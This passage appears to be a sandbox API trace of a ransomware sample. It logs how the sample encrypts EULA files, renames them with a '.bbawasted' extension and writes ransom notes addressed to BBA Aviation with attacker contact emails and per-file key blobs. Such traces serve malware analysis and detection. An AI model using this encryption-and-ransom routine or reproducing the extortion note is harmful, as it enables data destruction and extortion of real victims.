Size=0x27a) returned 0x6ad900 [0237.789] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.789] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6bd0) returned 1 [0237.790] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.790] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0237.790] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sl-si.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0237.791] WriteFile (in: hFile=0x280, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.792] SetEndOfFile (hFile=0x280) returned 1 [0237.792] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.792] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sl-si.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sl-si.htm.bbawasted")) returned 1 [0237.795] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sl-si.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0237.795] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0237.795] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1026f [0237.795] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1026f) returned 0x610000 [0237.796] CloseHandle (hObject=0x28c) returned 1 [0237.999] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0238.001] CloseHandle (hObject=0x27c) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0238.001] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6818) returned 1 [0238.001] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0238.001] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0238.002] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0238.002] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0238.002] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0238.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0238.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0238.013] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OVq/Z4P7G7iKWWtylmBHEVECPOzrLf+fjLzhqZ5LcLGoO45NbPX4i+vF88NU4aPY\r\n/GLu6SwGDX9ChkPgNbvk8W5YqEKs8rncuqH5Dd+xKA5E+u29CFDVZyeWyHB1AyMw\r\nRcVe5zdaDLXsZKcxwzE9bkQhr/XZYrmXY+WQEfw/G7Zom7c2ZZmzCs3YZgX6KYP4\r\nmnMbRTz4e8pasQyMy9rns6+NLRKV1aUadk8bGnpU8n4cTaoRs2HH+E54K/qpO99z\r\n9FT3D3LLW8jPCf+Jm+9NZmhyBy8eDYWssTkBT/Tl5XqGQKWc9J2ueuScDDUBsMl6\r\nz8xfPgvDzstI1wfl7Wa8nJcReVN3Mn6ODrdsGHv6dkBI0aVnBTqJLodp4CTWltId\r\nqJUq0K5eHYSho0WDYmyJXtSOHRIDU0fxwYPNR+T3lXqaLRR3fkT3JBKATPpSGEor\r\nPzMAvLPnOxp13y3WidetrQgMDcWTE/4WPt75gAuf8+J0HAOwPBmY5rqgapm1iXRO\r\nIKmC1Vzy68BA8l4JgHoEIAvqoW2Rh91jOVT9ufx5pF/BqCZcnMPGuwCoKuOdabE8\r\nB9SWSjklx/cfJhEdp8LPpPeqXht4rAHkuNm0U+MczrD/H+EL7ix3m4mA/Q1ZY21C\r\nVvEOlcrleh0NOwVBbNdeLIOSezEAENrl6FxsZp8x+0Y=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0238.013] WriteFile (in: hFile=0x280, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0238.013] SetEndOfFile (hFile=0x280) returned 1 [0238.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0238.221] CloseHandle (hObject=0x280) returned 1 [0238.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0238.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c0c78 | out: hHeap=0x660000) returned 1 [0238.254] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6570) returned 1 [0238.255] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0238.255] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0238.255] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm") returned 56 [0238.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0238.255] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.255] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6680) returned 1 [0238.256] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0238.256] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0238.256] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_th-th.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0238.258] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.259] SetEndOfFile (hFile=0x294) returned 1 [0238.259] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.259] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_th-th.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_th-th.htm.bbawasted")) returned 1 [0238.260] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_th-th.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0238.260] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0238.261] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x3e0c1 [0238.261] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e0c1) returned 0x1480000 [0238.261] CloseHandle (hObject=0x290) returned 1 [0238.271] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0238.282] CloseHandle (hObject=0x28c) returned 1 [0238.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0238.283] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a61b8) returned 1 [0238.283] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0238.283] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0238.284] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6c58) returned 1 [0238.284] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0238.284] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0238.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0238.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0238.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.328] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]m3AtKqzAFuEf1P/aIl5n52nl+Itj6c19UOSAbTbXrdZnPsyL4IzPdN5iA22+3mne\r\nBHnTCQeC4xaZC6IQCM9dz51halKetURnnYPsx9dR9ouZG5PHjZ0Gz3fLNJEWUXC6\r\nLXBk/MtQXDr9OYLOE5zWJlWL2L0sRrCpnvF5V1mpq8C5lxytNIZSX6rqJBeG1DCt\r\nVJ6/TgN2RogtLrNdr4hellVdy+COlJx64ep6pIGw593SDOonGbCpwncFrfJrQEVJ\r\nE9RCjXj4qMEiKTpxUgnQ5zsSOK5MOx5BNxs6gz2a0MKl7dcAdsSVVTU0mnvQ6yNa\r\nk14NCsgZFPxT5hqsFXzg+QiZtXEZQp8Ls5V5m7G1qcZuINEOOrnFtviGUAf7zZYP\r\n9J39hQyPQedFezGoSpkPb6pdmuqe2niQvi49vi7DBp5k7nBkRXQfoJBxlorUhwlD\r\njSxTXiZw6T1fRi2IJTOaNEeVh2KpnPMNbTK2RkTA/EpGFeqmlMmJ1EHIF/66ye07\r\nDNWmGNqi58X87LOvCDV+4m0o4s3+g4leSeARHY+QmHTFuoNRSop7J1x0v6fixtl6\r\nPX555M+ex0UuX4DS1CsSug8BYDjH8h4wqZrCQbnN5UNUJPTU8cGYSOXstqUuLHBC\r\nLPXWK77pxv/wwBjwIiCO4O/QBy2W9qaUaZpcIsOpr+6=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0238.328] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0238.328] SetEndOfFile (hFile=0x294) returned 1 [0238.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.331] CloseHandle (hObject=0x294) returned 1 [0238.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0238.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c0e18 | out: hHeap=0x660000) returned 1 [0238.332] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6bd0) returned 1 [0238.332] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0238.333] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0238.333] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm") returned 56 [0238.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0238.333] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.333] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6bd0) returned 1 [0238.333] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0238.334] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0238.334] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_tr-tr.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0238.335] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.433] SetEndOfFile (hFile=0x294) returned 1 [0238.433] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.433] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_tr-tr.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_tr-tr.htm.bbawasted")) returned 1 [0238.435] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_tr-tr.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0238.435] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0238.436] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x12581 [0238.436] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12581) returned 0x5f0000 [0238.436] CloseHandle (hObject=0x280) returned 1 [0238.439] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0238.441] CloseHandle (hObject=0x290) returned 1 [0238.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0238.441] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a64e8) returned 1 [0238.442] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0238.442] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0238.442] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a68a0) returned 1 [0238.442] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0238.442] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0238.453] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0238.454] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0238.454] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.454] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]RvvwPXR9LdbAktwQ2TGdQAZasQiLKTcZLFryv6JnxzNxTxv/uSG27jQWnbL2r7mo\r\n+t/Al7hpTLXF2+pOwTg2nns9pVjB5yMYECU0ARRAOJpbNGgFufExxNu9zcm1rX69\r\neqFNBGnUa6LTi5MgsPIiT/KG6GcZQu5zygshZRWwkLC6HEmSybyYGB/HDKbjbcat\r\nxxgeFzqsf//XXK3zUiJtlpn7mvTRAGS+Xv8Ln/6P4NGwRdBJwk6ogoEx5+yi4ciu\r\nWzxjZbygXBZn185pdx8o0OpqHtrDo35w9aQqlEv3+UD+fSaSX20jErI7TmxgvaLZ\r\nNc7Ixlt3/WhroKCzXi8quPQyJoImDsdVbNYAqMRRoeNF9r8vkP8m0MzN1l9GLZ86\r\nNtpx5na+p+YI9IgWI/HIxNtTJD91jH1IP338Lp8iuNsuy7xNAuwoNrtbbeIdO5PF\r\nz0h6ekMpBKjtlTTQ7yKxKkG3EEakbRMF8SOfG5xKrM4b/j9f77osEAp/KXL8FOVn\r\n+S5vUbMOS8DbxzwbFDQIU48kkx1NH9Re1dllwz6lh90WQsehSW3wZ84bOXVbW4uG\r\n/gKxHggvP82kd+OwdSk8+bZFcdTtHVPl88soqbopBuuesUbzaKX41h4tgiWb+lLs\r\ncks3LMINPfiYzFDdIPuSrIKedWLeIXu0w+KCWNxKrjl=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.454] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0238.454] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0238.454] SetEndOfFile (hFile=0x294) returned 1 [0238.457] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.457] CloseHandle (hObject=0x294) returned 1 [0238.457] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0238.457] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c29b8 | out: hHeap=0x660000) returned 1 [0238.458] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6a38) returned 1 [0238.458] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0238.458] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0238.458] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm") returned 56 [0238.458] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0238.459] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.459] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f10) returned 1 [0238.459] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0238.459] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0238.459] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-cn.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0238.460] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.462] SetEndOfFile (hFile=0x294) returned 1 [0238.462] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.462] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.462] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-cn.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-cn.htm.bbawasted")) returned 1 [0238.463] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-cn.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0238.463] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, 